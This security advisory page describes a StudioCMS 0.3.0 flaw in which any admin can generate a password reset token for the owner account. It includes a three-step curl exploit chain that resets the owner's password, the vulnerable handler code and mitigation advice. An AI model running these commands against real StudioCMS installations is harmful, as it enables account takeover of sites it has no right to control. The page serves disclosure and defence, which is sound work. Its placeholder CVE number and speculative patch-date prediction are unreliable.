StudioCMS, Privilege Escalation / Account Takeover, CVE-2026-XXXXX (Critical)

Listen to this Post

The vulnerability allows any authenticated admin user to take over the highest-privileged “owner” account. The flaw exists in the `POST /studiocms_api/dashboard/create-reset-link` endpoint. While the handler correctly checks that the caller has the ‘admin’ role, it critically fails to validate two things: first, it does not compare the `userId` provided in the JSON payload against the authenticated caller’s session ID, allowing an admin to specify any target user. Second, it does not enforce role hierarchy, so an admin is permitted to target the owner. The handler then generates a valid password reset JWT token for the specified victim and returns this token directly in the HTTP response. An attacker can then use this token with the `POST /studiocms_api/dashboard/reset-password` endpoint to set a new password for the owner account, completing the account takeover. The core issue is treating password reset generation as a generic admin operation without self-service scope restrictions.
Platform: StudioCMS
Version: 0.3.0
Vulnerability: Account Takeover
Severity: Critical
Date: March 12, 2026

Prediction: Patch by March 19, 2026

What Undercode Say:

Analysis

This is a critical Insecure Direct Object Reference (IDOR) vulnerability combined with a failure in role-based access control (RBAC) hierarchy enforcement. Unlike other endpoints that might restrict actions based on privilege levels, this specific handler for creating reset links treats the `userId` parameter as fully trusted. By returning the generated JWT token in the response, the application provides a complete, weaponizable payload for privilege escalation, making exploitation trivial.

Exploit

The following `curl` commands demonstrate the full attack chain from an admin user to takeover the owner account.

1. Verify Attacker Session (Admin):

curl -X POST http://127.0.0.1:4321/studiocms_api/dashboard/verify-session \
-H "Content-Type: application/json" \
-H "Cookie: auth_session=<admin_session_cookie>" \
-d '{"originPathname":"http://127.0.0.1:4321/dashboard"}'

2. Generate Reset Token for Owner:

curl -X POST http://127.0.0.1:4321/studiocms_api/dashboard/create-reset-link \
-H "Content-Type: application/json" \
-H "Cookie: auth_session=<admin_session_cookie>" \
-d '{"userId": "2450bf33-0135-4142-80be-9854f9a5e9f1"}'

Note: The response will contain the `token` value needed for the next step.

3. Reset Owner Password with Token:

curl -X POST http://127.0.0.1:4321/studiocms_api/dashboard/reset-password \
-H "Content-Type: application/json" \
-H "Cookie: auth_session=<admin_session_cookie>" \
-d '{
"id": "e11c98ac-d523-4404-b9c6-921d7d01cdcd",
"userid": "2450bf33-0135-4142-80be-9854f9a5e9f1",
"token": "<reset_jwt_token>",
"password": "pwned1234@@",
"confirm_password": "pwned1234@@"
}'

Vulnerable Code Snippet

The issue originates in `packages/studiocms/frontend/pages/studiocms_api/dashboard/create-reset-link.ts`:

const isAuthorized = ctx.locals.StudioCMS.security?.userPermissionLevel.isAdmin; // [bash] OK: Checks admin
if (!isAuthorized) { return apiResponseLogger(403, 'Unauthorized'); }
const { userId } = yield readAPIContextJson<{ userId: string }>(ctx); // [bash] User-controlled ID
// [bash] Missing: Check if userId matches caller's identity
// [bash] Missing: Check if target outranks caller
const token = yield sdk.resetTokenBucket.new(userId); // [bash] Token generated for victim

Protection from this CVE

  1. Upgrade: Update to the latest patched version of StudioCMS immediately.
  2. Input Validation: The application must validate that the `userId` provided in the request body matches the session ID of the authenticated user.
  3. Role Hierarchy: Implement checks to prevent a lower-privileged admin from performing actions on a higher-privileged owner account.
  4. Token Handling: Password reset tokens should be sent out-of-band (e.g., via email) and never exposed in API responses to the requesting client.

Impact

  • Complete System Compromise: Any admin user can change the owner’s password and log in as the owner.
  • Privilege Escalation: This allows a malicious admin to grant themselves further permissions, delete other users, or lock out the legitimate owner.
  • Data Breach: Full control over the CMS instance leads to access of all content, user data, and system configurations.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top